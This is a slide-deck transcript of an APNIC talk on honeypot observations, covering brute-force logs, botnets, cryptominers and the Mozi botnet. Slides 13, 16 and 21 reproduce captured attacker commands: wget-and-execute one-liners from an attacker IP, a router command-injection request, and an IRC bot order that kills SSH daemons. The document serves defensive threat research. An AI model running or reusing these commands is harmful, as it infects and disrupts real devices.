APNIC Senior Internet Security Specialist Adli Wahid shares his insights on observations from the APNIC Community Honeynet Project at InfoSec Taiwan 2023, held in Taipei from 1 to 4 August 2023.

1. APNIC Community Honeynet
Project – Observations and
Insights
Adli Wahid
adli@apnic.net
1

2. 你好
oSr. Security Specialist @ APNIC since 2014
o Previously at Malaysia CERT, Bank of Tokyo
Mitsubishi UFJ
oLet’s Connect – Adli Wahid on LinkedIn
2

3. The Plan
1. APNIC Community Honeynet Project
2. Observations / Insights
3. Take Aways
3

4. Honeypots / Honeytokens
• Old Tech?
• Exposed systems / Tokens
• No production value
• Enterprise vs Research Honeypots
• Real value for defenders
o Detection
o Starting point for investigation
o IOCs
• But
o Coverage – not all type of attacks
o Depends on how you setup the honeypots vs knowledge of attack
o Fingerprint
4

5. APNIC Community Honeynet Project
• APNIC – Regional Internet Registry for Asia Pacific Region
oIP addresses delegation, whois, RPKI
oCapacity Development
• APNIC Community Honeynet Project
• Initially used for awareness and training (2014)
• Since 2018 deployment with multiple sensors
• The Backend
• Open Source projects (Community Honey Network / CHN), Elastic Stack +
scripts
• Mix of Telnet/SSH (Cowrie) and Dionaea
5

6. APNIC Community Honeynet Project (2)
• Data Shared / Used
oInternally dash.apnic.net for APNIC Members to be notified if
their IPs are seen in the honeypot logs
oSharing with communities – ShadowServer Foundation,
CERTs/CSIRTs, Feeds for MISP
o Research and Analysis (need to do more here)
• We welcome partnerships in any form J
6

7. Observation and Insights
7

8. In a nutshell
• No surprises, nothing really ‘sophisticated’
• Botnets, ddos agents, miners
• Attackers build infrastructure for running attacks & campaigns
• Attackers leverage on open vulnerabilities
• Easy to spot and see – but if you’re not watching (or aware) you’ll
miss it
• Bigger picture – secure development, deployment and incident
response. How can we stop or discourage the attacks?
8

9. Overall Activities
9
Last 6 months

10. 2023-07-30T23:59:51.681797,123.231.151.253,root,383838
2023-07-30T23:59:50.813437,123.231.151.253,root,5656561
2023-07-30T23:59:48.431446,123.231.151.253,root,9874563211
2023-07-30T23:59:45.010816,123.231.151.253,root,GERARD
2023-07-30T23:59:39.750655,123.231.151.253,root,akissi
2023-07-30T23:59:38.793250,123.231.151.253,root,ambrine
2023-07-30T23:59:38.276482,123.231.151.253,root,anaana
2023-07-30T23:59:36.850619,123.231.151.253,root,anselme
2023-07-30T23:59:35.801531,123.231.151.253,root,austerlitz
2023-07-30T23:59:33.884860,123.231.151.253,root,azerty974
2023-07-30T23:59:31.632187,123.231.151.253,root,bassem
2023-07-30T23:59:30.715563,123.231.151.253,root,bavaria
2023-07-30T23:59:30.186663,123.231.151.253,root,bbbbbbbb
2023-07-30T23:59:29.203047,123.231.151.253,root,bechir
2023-07-30T23:59:28.597009,123.231.151.253,root,belmondo
2023-07-30T23:59:27.717122,123.231.151.253,root,bentley
2023-07-30T23:59:27.182316,123.231.151.253,root,bhabykoh1
2023-07-30T23:59:26.203547,123.231.151.253,root,bikini
2023-07-30T23:59:25.728146,123.231.151.253,root,bismiallah
2023-07-30T23:59:24.809240,123.231.151.253,root,blanc
2023-07-30T23:59:24.250217,123.231.151.253,root,boby
10
Source IP & Timestamp & AS

11. Downloads & URLs
11
2023-02-06T22:32:01.248865,202.124.229.77,hxxp://118.86.15.25:34085/.i
2023-02-08T04:29:02.359614,202.124.224.179,hxxp://123.173.71.87:51503/.i
2023-02-09T03:06:02.789030,202.124.224.179,hxxp://203.204.217.138:19417/.i
2023-02-12T23:21:47.265826,202.124.227.93,hxxp://1.70.126.204:30118/.i
2023-02-16T23:27:35.547120,202.124.229.186,hxxp://114.228.140.87:36723/.i
2023-02-17T06:25:43.343654,202.124.229.20,hxxp://82.69.113.63:30883/.i
2023-02-18T22:22:14.465161,202.124.224.131,hxxp://87.227.59.193:1381/.i
2023-02-21T15:51:05.454736,202.124.229.55,hxxp://223.8.197.140:32892/.i
2023-02-27T07:48:11.948785,202.124.231.186,hxxp://211.20.200.220:56107/.i
2023-03-02T17:29:24.979021,202.124.224.73,hxxp://24.184.1.41:64433/.i
2023-03-05T04:18:25.331950,202.124.230.84,hxxp://76.201.146.204:17638/.i
Infrastructure

12. 12
200.4.111.90,hxxp://209.97.132.66/miner.sh
199.19.225.172,hxxp://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh
198.98.54.17,hxxp://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh
194.85.248.46,hxxp://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh
194.61.0.210,hxxp://209.97.132.66/miner.sh
194.59.204.33,hxxp://106.10.122.53/miner.sh
193.228.194.203,hxxp://106.10.122.53/miner.sh
193.176.78.138,hxxp://106.10.122.53/miner.sh
192.99.7.127,hxxp://58.135.80.99/a/miner.sh
192.81.216.156,hxxp://58.135.80.99/a/miner.sh
192.187.20.135,hxxp://58.135.80.99/a/miner.sh
191.232.49.146,hxxp://209.97.132.66:81/miner.sh
187.167.235.103,hxxp://209.97.132.66:81/miner.sh
185.70.93.16,hxxp://58.135.80.99/a/miner.sh
185.238.72.212,hxxp://209.97.132.66/miner.sh
185.193.136.69,hxxp://58.135.80.99/a/miner.sh
18.157.95.10,hxxp://106.10.122.53/miner.sh
180.250.124.195,hxxp://58.135.80.99/a/miner.sh
7.189.3.160,hxxp://164.90.199.163/nbminereth.rar
107.189.1.85,hxxp://164.90.199.163/nbminereth.rar
103.41.207.7,hxxp://58.135.80.99/a/miner.sh
103.254.153.159,hxxp://58.135.80.99/a/miner.sh
103.171.88.198,hxxp://106.10.122.53/miner.sh
Need to analyse shell
script to get more
information or
insights

13. 13
cd /tmp
wget -qc http://209.97.132.66/miner3.tgz
tar xf miner3.tgz
rm -rf miner3.tgz
cd .cache
chmod +x *
./x >.a
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://176.223.139.141/mips; chmod +x mips; ./mips; rm -rf
mips
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://176.223.139.141/mipsel; chmod +x mipsel; ./mipsel; rm -
rf mipsel
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://176.223.139.141/sh4; chmod +x sh4; ./sh4; rm -rf sh4
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://176.223.139.141/x86; chmod +x x86; ./x86; rm -rf x86
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://176.223.139.141/arm61; chmod +x arm61; ./arm61; rm -rf
arm61
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://176.223.139.141/i686; chmod +x i686; ./i686; rm -rf
i686
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://176.223.139.141/ppc; chmod +x ppc; ./ppc; rm -rf ppc
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://176.223.139.141/586; chmod +x 586; ./586; rm -rf 586
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://176.223.139.141/m68k; chmod +x m68k; ./m68k; rm -rf
m68k
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://176.223.139.141/dc; chmod +x dc; ./dc; rm -rf dc
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://176.223.139.141/dss; chmod +x dss; ./dss; rm -rf dss
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://176.223.139.141/co; chmod +x co; ./co; rm -rf co
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://176.223.139.141/scar; chmod +x scar; ./scar; rm -rf
scar

14. What is in the Config?
"pools": [
{
"algo": null,
"coin": null,
"url": "pool.hashvault.pro:80",
"user":
"49oZc6c6rB58TD6KmU2m5qGGbmdeknXgQHrU[redacted]TqrjpzwdTTnwhShnoWz4BbKAMfWLNApG6ARGoS",
[redacted]
14

15. 15
./20220804/sos.vivi.sg/ns2.jpg
./20221108/185.161.208.234/test.jpg
./20220722/103.240.90.249/ns2.jpg
./20230128/185.161.208.234/test.jpg
./20220607/mangocorner.com.sg/ns2.jpg
./20230502/185.161.208.234/vent.jpg
./20221107/185.161.208.234/test.jpg
./20220825/drpelvicpain.com/nano.jpg
./20220825/sos.vivi.sg/ns2.jpg
./20230115/185.161.208.234/w.jpg
./20230613/124.70.7.7/ns2.jpg
$server = 'gsm.ftp.sh' unless $server;
my $port = '1080';
my $linas_max='8';
my $sleep='5';
my $homedir = "/tmp";
my $version = 'DDoS Perl Bot v1.0';
my @admins = ("w","z","x","y");
my @hostauth = ("HSBC.users.undernet.org");
my @channels = ("#w");

16. C2
B B
B
B B
NICK x86|x|1|919043|server
USER x00 localhost localhost :2021g
:IRC!IRC@0x.01 PRIVMSG x86|x|1|919043|server :.VERSION.
:. 010 . 127.0.0.1 6667 :
:. 005 . :
:. 376 . :
NICK x86|x|1|919043|server
MODE x86|x|1|919043|server -xi
JOIN #0x86 :777
NICK x86|x|1|919043|server
MODE x86|x|1|919043|server -xi
JOIN #0x86 :777
:x86|x|1|919043|server!x00@x.y.z.k JOIN :#0x86
:bot!.@. PRIVMSG #0x86 :!* SH ( kill -9 `cat /var/run/dropbear.pid` `cat /var/run/sshd.pid` ; service sshd stop ; sudo service
sshd stop ; killall -9 sshd dropbear ; kill -9 `pidof sshd` `pidof dropbear` )>/dev/null 2>&1 &
NOTICE bot :
:0x.01 412 x86|x|1|919043|server :No text to send
S
?
Sandboxing
16

17. Quick recap
• From the URL the are a few opportunities to identify IOCs or
techniques being used to spread, hide and payloads
17

18. Tracking Activities Over Time
18

19. Changing Infrastructure
• DDoS Botnet (Tsunami**)
• Started with just 4 hosts in April 2021
• More than 12k ip addresses to date
• Evolution
• April 21 – Jan 22
o hxxp://71.127.148.69/.x/*.sh
• Jan 22 – Feb 22
o hxxp://202.110.187.205/.x/*.sh
• Feb 22 –
o hxxp://61.177.137.133/.x/*.sh
oStill active in 2023. 5-6 to URL(IP
address)
19

20. Left-Over of Mozi (p2p botnet)?
20
https://blog.netlab.360.com/the-mostly-dead-mozi-and-its-lingering-bots/

21. Check your weblogs (for Mozi.m, Mozi.a)
durian.fsck.my -- 93.56.202.158[10/Oct/2022:14:24:55 +0900]
"GET/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;
wget+http://93.56.202.158:53157/Mozi.m+-O+/tmp/netgear;
sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 301 0
21

22. Activities in Honeypots
22
• In 05/2022, we observed an ELF
binary “.i” in some URLs
o Post-login downloads
• Pattern looks familiar
http://xxx.xxx.xxx.xxx:random_port/.i
• IP in URL can be the same as attacking
host or different
1. Telnet username:password
2. wget http://x.x.x.x:nnnn/.1
Source IP (attacking/spreading) IP hosting binary:random_port
o2022-05-25T11:23:24.433026,59.3.30.251,hxxp://59.3.30.251:10035/.i,KR,4766
o2022-05-25T17:27:31.588334,222.174.143.18,hxxp://222.174.143.18:56102/.i,CN,4134
o2022-05-26T03:46:12.338083,114.34.185.8,hxxp://114.34.185.8:11470/.i,TW,3462
o2022-05-26T03:30:41.219380,95.154.75.244,hxxp://95.154.75.244:12107/.i,RU,44724
o2022-05-26T06:51:04.319952,37.255.216.173,hxxp://51.19.186.165:23349/.i,IR,58224
o2022-05-26T07:58:51.970983,167.179.185.255,hxxp://31.168.218.95:28681/.i,AU,4764
o2022-05-26T07:35:24.881174,114.230.69.4,hxxp://114.230.69.4:10816/.i,CN,4134
o2022-05-26T08:32:08.109785,167.179.61.43,hxxp://46.237.87.18:9331/.i,HK,135273

23. The “.i” & Finding Mozi
o .i: ELF 32-bit LSB executable,
ARM, EABI5 version 1 (GNU/Linux),
statically linked, stripped
• SHA256
a04ac6d98ad989312783d4fe3456c53730
b212c79a426fb215708b6c6daa3de3
o Known to VirusTotal
• Finding Mozi
• Maybe we can find Mozi.m or Mozi.a on
the webserver?
o If .i in $IP:PORT
o Then download $IP:PORT/mozi.a
|| $IP:PORT/mozi.m ||
$IP:PORT/Mozi.m ||
$IP:PORT/Mozi.a ||
$IP:PORT/config
23

24. Observations – (hash) fingerprints
:~/feeds/dload/20220601/50.83.145.125:43900$ sha256sum * .i
a04ac6d98ad989312783d4fe3456c53730b212c79a426fb215708b6c6daa3de3 mozi.a
a04ac6d98ad989312783d4fe3456c53730b212c79a426fb215708b6c6daa3de3 Mozi.a
a04ac6d98ad989312783d4fe3456c53730b212c79a426fb215708b6c6daa3de3 mozi.m
9bcbb326a28b09faeb6fbfc0e7d68fe6ff79b7248c7b2510aa8dd11cc55e0356 Mozi.m
b82e420c071c1c1a5cbf1ad8ba143f5b804a6fe4fd2fbcd28db20f471b7065ab .i
~/feeds/dload/20220601/222.103.181.173:1117$ sha256sum * .i
479768e26969e241244a475f97b1268fd02e303a8d6b5d15c71b552815cae14b mozi.a
a04ac6d98ad989312783d4fe3456c53730b212c79a426fb215708b6c6daa3de3 Mozi.a
a04ac6d98ad989312783d4fe3456c53730b212c79a426fb215708b6c6daa3de3 mozi.m
a04ac6d98ad989312783d4fe3456c53730b212c79a426fb215708b6c6daa3de3 Mozi.m
6d41f05fe458414332980d420e42b12d01bd21497631f5b6e60fc8082c170bed .i
~/feeds/dload/20221011/36.229.220.191:27611$ sha256sum * .i
23171f17aa39a4b7c9c492c9bc4668697f68e1863c77ef6502e38ca53860c2fa i
b6d6ee5d756cfe9a9638769abef15294d7a9189ac49dc43d9b06fb04976b3bf5 mozi.a
a04ac6d98ad989312783d4fe3456c53730b212c79a426fb215708b6c6daa3de3 Mozi.a
b9410c9df55f3bdfe0cc37f215bbf6d77f85bf5bdad9eb965ad2130f43138657 mozi.m
b9410c9df55f3bdfe0cc37f215bbf6d77f85bf5bdad9eb965ad2130f43138657 Mozi.m
289aba46ba734b2aef8a82dc983ef1451e303fc33c05820dd07cb7551ad1a310 .i
24
Are they the
same files?

25. Mozi (story) Recap
• A known threat
• Still propagating (58k) unique ip
addresses observed since last year
• Basic Practice of device security
management* can help prevent
infection but …
25
Palau (PW)

26. Take Aways
1. Honeypots has value
o Simplest form of detection or awareness but allows going in depth
o Understanding Attackers Infrastructure (Left of the Hack)
o Priorities Ransomware vs DDoS agent vs Crytpominers
o Priorities: Windows vs Linux/Unix
2. Incident Response
o Sharing is not equal to fixing
o Prevention is great but what about the actors
o Capabilities and Appetite of relevant entities (CERTs/CSIRTs, LEAs)
3. Implication of No Action
o Security implementation is not wholistic
o Cyber criminal: Access broker, problem getting bigger (DDoS), profitability
26

27. Thank You
Adli Wahid
http://www.apnic.net
adli@apnic.net
27